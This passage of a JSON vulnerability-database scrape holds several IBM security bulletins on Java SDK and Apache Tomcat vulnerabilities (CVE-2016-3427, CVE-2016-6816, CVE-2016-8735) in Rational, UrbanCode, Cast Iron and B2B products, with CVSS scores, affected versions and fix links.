"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T22:44:22", "id": "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "href": "https://www.ibm.com/support/pages/node/278963", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:40", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 that is used by Rational Reporting for Development Intelligence (RRDI). The issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRRDI 2.0, 2.0.1, 2.0.3 and 2.0.4| Cognos BI 10.1.1 \nRRDI 2.0.5 and 2.0.6| Cognos BI 10.2.1 \nRRDI 5.0, 5.0.1 and 5.0.2| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of RRDI. \n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0, 2.0.0.1, 2.0.1, 2.0.3 and 2.0.4** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nReview technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0.5 and 2.0.6 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 17 (Implemented by file 10.2.5000.528)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n**RRDI 5.0 and 5.0.1 and 5.0.2 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983302>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 16 (Implemented by file 10.2.5010.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects Rational Reporting for Development Intelligence (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "9A135CF5F1DD70B64FF2E55C6A7E52F7C3A64DEEFDD86F45910661C5A67617D8", "href": "https://www.ibm.com/support/pages/node/279263", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-12T18:18:27", "description": "## Summary\n\nThe Jazz Team Server is shipped with or supports versions of the Apache Tomcat web server which contain security vulnerabilities that could potentially impact the following IBM Rational products deployed on Apache Tomcat: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rhapsody Design Manager (Rhapsody DM), Rational Software Architect Design Manager (RSA DM), Rational Team Concert (RTC), and Rational Quality Manager (RQM).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 4.0 - 6.0.3 \n \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 - 6.0.3 \n \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 - 6.0.3 \n \nRational DOORS Next Generation 4.0.1 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 - 6.0.3 \n \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 - 6.0.3 \n \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 - 6.0.3 \n \nRational Software Architect Design Manager 4.0 - 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0 - 6.0.1\n\n## Remediation/Fixes\n\nIn order to get all the available security updates, upgrade your products to version **4.0.7** or **5.0.2** or **6.0.2** or **6.0.3**, apply the latest ifix, and then perform the following upgrade: \n\n\n * The fixes are in Apache Tomcat version 7.0.73 or later. Perform [_How to update the Apache Tomcat server for IBM Rational products based on versions 3.0.1.6, 4.0.7 or later of IBM's Jazz technology_](<http://www.ibm.com/support/docview.wss?uid=swg21687641>) to apply the remediation.\n \n**Note:** If you cannot upgrade to 4.0.7 or 5.0.2 or 6.0.2 or 6.0.3, contact [IBM support](<https://www.ibm.com/support/servicerequest>) for guidance. \n. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2021-04-28T18:35:50", "id": "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", "href": "https://www.ibm.com/support/pages/node/289331", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T17:45:51", "description": "## Summary\n\nMultiple vulnerabilities in Apache Tomcat affect IBM UrbanCode Release\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:**[ CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION: **Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Release 6.2.0.0 - 6.2.1.2\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **Remediation/First Fix** \n---|---|--- \nIBM UrbanCode Release| 6.2.0.0 \n6.2.1.0 \n6.2.1.1 \n6.2.1.2| [6.2.1.3](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/UrbanCode+Release&release=6.2.1.0&platform=All&function=fixId&fixids=6.2.1.3-UrbanCode-Release&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:33:29", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Tomcat affect IBM UrbanCode Release", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T22:33:29", "id": "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "href": "https://www.ibm.com/support/pages/node/599281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:39:22", "description": "## Summary\n\nThere are vulnerabilities (CVE-2016-8735, CVE-2016-6816) reported in Apache Tomcat v6 that is used by WebSphere Cast Iron Solution. WebSphere Cast Iron has remediated the affected versions.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nWebSphere Cast Iron v 7.5.0.0, 7.5.0.1, 7.5.1.0 \nWebSphere Cast Iron v 7.0.0.0, 7.0.0.1, 7.0.0.2 \nWebSphere Cast Iron v 6.4.0.0, 6.4.0.1 \nWebSphere Cast Iron v 6.3.0.0, 6.3.0.1, 6.3.0.1\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nCast Iron Appliance| 7.5.0.0 \n7.5.0.1 \n7.5.1.0| LI79413| [7.5.1.0-CUMUIFIX-006](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.5.1.0&platform=All&function=fixId&fixids=7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.scrypt2,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.vcrypt2,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.32bit.sc-linux,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.sc-linux,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.32bit.sc-win,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.sc-win,7.5.1.0-WS-WCI-20170111-2346_H7_64-CUMUIFIX-006.32bit.studio,7.5.1.0-WS-WCI-20170111-2346_H7_64-CUMUIFIX-006.studio,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.docker&includeSupersedes=0>) \nCast Iron Appliance| 7.0.0.0 \n7.0.0.1 \n7.0.0.2| LI79413| [7.0.0.2-CUMUIFIX-034](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.0.0.2&platform=All&function=fixId&fixids=7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.scrypt2,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.vcrypt2,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.32bit.sc-linux,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.32bit.sc-win,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.sc-linux,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.sc-win,7.0.0.2-WS-WCI-20170224-0641_H9_64-CUMUIFIX-034.32bit.studio,7.0.0.2-WS-WCI-20170224-0641_H9_64-CUMUIFIX-034.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.4.0.0 \n6.4.0.1| LI79413| [6.4.0.1-CUMUIFIX-043](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.4.0.1&platform=All&function=fixId&fixids=6.4.0.1-WS-WCI-20170125-1122_H3-CUMUIFIX-043.scrypt2,6.4.0.1-WS-WCI-20170125-1122_H3-CUMUIFIX-043.vcrypt2,6.4.0.1-WS-WCI-20170125-1213_H5-CUMUIFIX-043.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.3.0.0 \n6.3.0.1 \n6.3.0.2| LI79413| [6.3.0.2-CUMUIFIX-024](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.3.0.2&platform=All&function=fixId&fixids=6.3.0.2-WS-WCI-20170125-1126_H4-CUMUIFIX-024.scrypt2,6.3.0.2-WS-WCI-20170125-1126_H4-CUMUIFIX-024.vcrypt2,6.3.0.2-WS-WCI-20170125-1127_H5-CUMUIFIX-024.studio&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-18T13:57:34", "type": "ibm", "title": "Security Bulletin: IBM WebSphere Cast Iron Solution is affected by Apache Tomcat vulnerabilities (CVE-2016-8735, CVE-2016-6816)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2019-11-18T13:57:34", "id": "7D29B4909C6BF3ADF472798B711970B396D8FD474F784096D0CD51E0C3DE6E56", "href": "https://www.ibm.com/support/pages/node/292627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:48:32", "description": "## Summary\n\nThe Rational Insight is shipped with a version of the Apache Tomcat web server which contains security vulnerabilities that could have a potential security impact.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 6.0 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of Rational Insight. \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 19 (Implemented by file 10.2.5000.537)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)](<http://www-01.ibm.com/support/docview.wss?uid=swg21996898>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 18 (Implemented by file 10.2.5012.504)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:19:05", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affect Rational Insight (CVE-2016-6816, CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:19:05", "id": "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "href": "https://www.ibm.com/support/pages/node/289765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:25", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7.0 that is used by IBM B2B Advanced Communications. These issues were disclosed as part of the IBM Java SDK updates for April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n**CVEID:** [_CVE-2016-3426_](<https://vulners.com/cve/CVE-2016-3426>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the JCE component could allow a remote attacker to obtain sensitive information resulting in a partial confidentiality impact using unknown attack vectors. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112457_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112457>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Multi-Enterprise Integration Gateway 1.0 - 1.0.0.1 \n\nIBM B2B Advanced Communications 1.0.0.2 - 1.0.0.5\n\n## Remediation/Fixes\n\n**_Fix*_**\n\n| **_VRMF_**| **_APAR_**| **_How to acquire fix_** \n---|---|---|--- \niFix 1.0.0.5_1| 1.0.0.5| IT15484| IBM Fix Central > 